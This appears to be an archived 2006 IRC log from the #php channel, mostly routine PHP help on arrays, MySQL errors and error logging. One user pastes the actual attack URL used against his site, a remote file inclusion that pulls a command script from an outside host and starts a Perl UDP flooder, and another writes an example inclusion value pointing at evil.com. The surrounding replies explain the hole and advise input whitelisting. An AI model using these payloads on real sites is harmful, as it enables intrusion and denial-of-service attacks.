logs archiveIRC Archive / Freenode / #php / 2006 / June / 14 / 1
[slack]
hi, can you tell me why this script dosen't work? http://www.nopaste.info/index.php?id=14d6079b3e .. i want if i klick on ID1 switch zu id ==1
caffinated
!tell [slack] about register_globals
AqD
anyone know something like hibernate (or better) for php?
(not like AR..)
[slack]
caffinated: sh*t... thx.. ;)
jhgjkguiyt6
anyone know about securing inputs in php script??? i got hacked by some kiddy script who was including stuff from another server??
richardlynch
jhgjkguiyt6: http://phpsec.org
jhgjkguiyt6
richardlynch thx
caffinated
jhgjkguiyt6: that's less about your inputs, and more about how you're using the data submitted by the inputs.
my guess is that you're doing something like: include($_GET['page']);
jhgjkguiyt6
caffinated no! i have nothing like this!!
         

caffinated
if he is causing your server to execute remote code, then you have something that is doing it.
richardlynch
If you got hacked as you describe, you have to have SOMETHING like that, somewhere, somehow...
||cw
!tell jhgjkguiyt6 about xss
jhgjkguiyt6
they used this link to get in
http://broadband.spectravoice.com/web/index.php?op=http://otravesso.100free.com/cmd.txt?&cmd=cd%20/tmp;mkdir%20.tt;cd%20.tt;perl%20udp.txt%20200.168.245.68%2027015%2027015
richardlynch
He only typed the one-liner obvious way of describing what you said happend, not the convoluted version.
||cw
jhgjkguiyt6: yeah, that sounds like you have include($op); ...guessing reg globals on too :)
caffinated
ROFL
that looks like a shell_exec actually
||cw
heh, Owned Group OwnzZ YouR SySteM
caffinated
haha, nice
yeah, you're right. include
jhgjkguiyt6
this script suck lol
caffinated
no, your code is suck.
jhgjkguiyt6
lol iam not the one who made it :P
||cw
jhgjkguiyt6: just make sure that op= something that you want it to equaly, like a number between 1 and 5 or a match from a set list of page names
jut don't eve trust user input. assume they will do something wrong
caffinated
since he could not see what was happening, i doubt he is qualified to fix it :P
||cw
edjumacation
jhgjkguiyt6
i see it now <td valign="top"><? include ($op.".php");?></td>
roler
how do I insert an entry into an existing array at a specific location?
caffinated
wow. quality.
richardlynch
So he's getting an education in the Real World that will eventually make him qualified. Isn't that why we bother?
||cw
hm, that .".php" should have failed it
at least for this one it would fail
         

caffinated
no, because it's easy to eliminate that
$op = "http://evil.com/foo.txt&hi="
||cw
ah, the ? in that op
missed that
Carrera
hi
does anyone know of a good php based PhoneBook
roler
is the only way to insert an entry into an array is go through it and add it to a temporary array and copy it back? or is there a php function for this
||cw
i'm sure freshmeat.net has lots of reviews on them
Carrera
ah
i found Address Book
||cw
roler: depends on where you want to insert it
Carrera
but didn't know about freshmeat.net
richardlynch
roler: Hunh? $array[] = 'value'; or $array[4] = 'fifth'; will do...
Carrera
thanks ||cw
richardlynch
roler: Or maybe you need http://php.net/array_splice
roler
richardlynch; well If I have a [4] already, I want [4] to go to 5
Kartagis
good night :)
richardlynch
roler: http://php.net/array_splice is DEFINITELY what you want.
ThePrhk
is there a way to load a module dynamicly and over ride a module that has been compilied in .. ?
||cw
ThePrhk: no
maybe with runkit
but therein lies madness
ThePrhk
so if gd is compilied in i would need to recompile php to update it .. ?
richardlynch
ThePrhk: Technically, you could just re-compile the GD extension to PHP and install just the .so (or .dll) file, IF you match up all the versions of everything (Apache/PHP) in the header files and all that... Compiling your second time is about 10 X faster than your first, if you are newbie. :-)
roler
thanks guys!
richardlynch
Buchannon: You could iterate through all the rows and build up a column... Or do you just mean the field names? http://php.net/mysql_field_name
PTWalrus
well, I want to check to see if a date has an entry in the database, and if not, create the entry with no information in it
CppIsWeird
is there any way in the script to change what SMTP server the mail function uses?
Buchannon
richardlynch: going through each row one by one would be quite taxing on mysql wouldn't it? Nah, not the field names but the values in a column
richardlynch
PTWalrus: Create a UNIQUE INDEX on the date field. Do an INSERT. It will fail if it's not unique. Problem solved.
PTWalrus
ahhh and that won't make any messy error messages?
richardlynch
Buchannon: How many rows are there?...
PTWalrus
I did make it unique
Buchannon
richardlynch: well only 2 right now, but I'm expecting it to get ibgger
richardlynch
PTWalrus: You control the error messages... if (mysql_errno() == 1062){ //duplicate insert, ignore it. }
Buchannon: Define "bigger"
Buchannon
richardlynch: hard to say right now, I think I found what I was looking for though with mysql_fet_array()
caffinated
better than letting it error is to use an ON DUPLICATE KEY syntax to take a different action.
that way, you can update any existing parts if it already exists.
sandstrom
On error reporting in php, is it possible to output errors to some log, without showing them to the user?
caffinated
http://php.net/set_error_handler
see also: http://php.net/error_log
richardlynch
sandstrom: That's kinda exactly what it says in php.ini... If you can't change php.ini, nor .htaccess, use set_error_handler as noted already.
caffinated
the second link is probably closer to what you want
orfeu
hy all
phoenixz
Hey there, anybody experience with mysql_connect NOT giving errors upon connect failures?
I have this REALLY weird thing.. I can login to mysql as any random user and mysql_connect just returns a resource
richardlynch
phoenixz: Nope. Are you using http://php.net/mysql_error to check them?
phoenixz
yeah
mysql_error and mysql_errno dont return anything either
richardlynch
phoenixz: And can you then execute queries with that resource?
Maybe your MySQL server is configured to let ANYBODY log in...
phoenixz
well, nope.. that not, the queries fail
richardlynch
So the mysql_select_db fails too, right?
cdecker
Hey all...
Wolfpaws
phoenixz: Do you maybe have an extra @ in there? Or error_reporting to 0?
phoenixz
not sure about the select_db...
I do have the @ in front of mysql_connect, so it wont show php errors, but it still should return fail on failure or not? plus, if i remove the @, it still goes on like nothing happened
cdecker
Sorry to bug you all...a buddy of mine just recently turned me on to this whole IRC thing. I had no idea there was such a huge resource out there for all things php related
I'm located in the DC area and am actively working to expand the local PHP community
richardlynch
cdecker: Just to warn you: All things php related is a bit more scope than we accept :-) Read the link at the tip-top
cdecker
any other DC'ers here?
Wolfpaws
cdecker: /msg php-bot guidelines
cdecker
ah...I appreciate the heads up.
phoenixz
checked, mysql_query("USE DATABASE blah") fails too
Wolfpaws
use mysql_select_db
phoenixz
so basically all fail, except msyql_connect()
ok, but that probably would give the same result or not?
richardlynch
phoenixz: can you show us the basic connect script, and output of var_dump($link) or whatever?
Wolfpaws
php.net/mysql and read it all
phoenixz
I mean.. If mysql_select_db would not fail if I logged in with wrong credentials, that would *really* freak me out.. :)
lig
(Action) waves Hi to everyone and scratches Wolfpaws behind the ears
Wolfpaws
(Action) grunts happily
heya, lig
lig
hey Wolfpaws
Wolfpaws
lig: Have you figured out, who I am? :)
phoenixz
Wolfpaws: Im very familiar with the mysql interface, its just that I have not encountered this one yet.. let me paste some info on the subject, one sec
lig
Wolfpaws, haven't a damn clue - but that is a normal state for me :)
Wolfpaws, gonna tell me?
Wolfpaws
ok
lig
LOL
(Action) rubs Wolfpaws belly
Wolfpaws
arf :3
sandstrom
Just realized my app doesn't take summer time (time saving, when you put clock 1 hour ahead at summer) into account.. how could I easily solve this? (right now I am only counting 1 hour ahead of GMT (we are at +1)
richardlynch
Should have known just from the number of kicks :-)
phoenixz
Wolfpaws
(Action) slaps richardlynch
richardlynch
Sorry. :-)
cdecker
So, like I mentioned I'm a member of the DC PHP community and am looking to help it expand. We've managed to start on our efforts by organizing a conference. I've submitted an article to Digg.com about it. You can view it here...http://digg.com/technology/PHP_Open_Source_Attempts_To_Reach_Federal_Government. I'd love for anyone interested in open source in the government to give it a look and digg it if they feel it's worthwhile.
richardlynch
cdecker: I dunno how you managed it, but that link isn't a link in my X-Chat client... I say this only to inform you for the future that you need to do something different... Whitespace in front of http, perhaps...
cdecker
richardlynch: I see...appreciate the heads up. I'm still learning my way around this whole IRC thing.
richardlynch
phoenixz: I think you may want to file a bug report... It really SHOULD return false if the username is not valid, no?
phoenixz
it should yeah..
I'll do some more testing before submitting a bug report.. if this one is true, its kind of a big one.. better be sure about it
warreng
sup y'all
cdecker
pheonixz: what's the problem that you're having?
larsemil
if i add something to a table, how do i, in the easiest way get to know the id of the data just added?
warreng
mysql_insert_id()
richardlynch
larsemil
perfect!
thgought something like that existed
leku
is there a regular expression library for PHP?
i wanna do like
warreng
preg_match/etc
leku
if $string =~ /^%/ { change it }
richardlynch
!tell leku about enter
leku: http://php.net/pcre
leku
please don't try and tell me how I should conduct myself on IRC
that is a waste of your time and mine.
warreng
!tell leku about enter
leku
as****es
warreng
heh
richardlynch
Saved somebody some time...
cdecker
interesting
cheater
hey
« prev 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 next »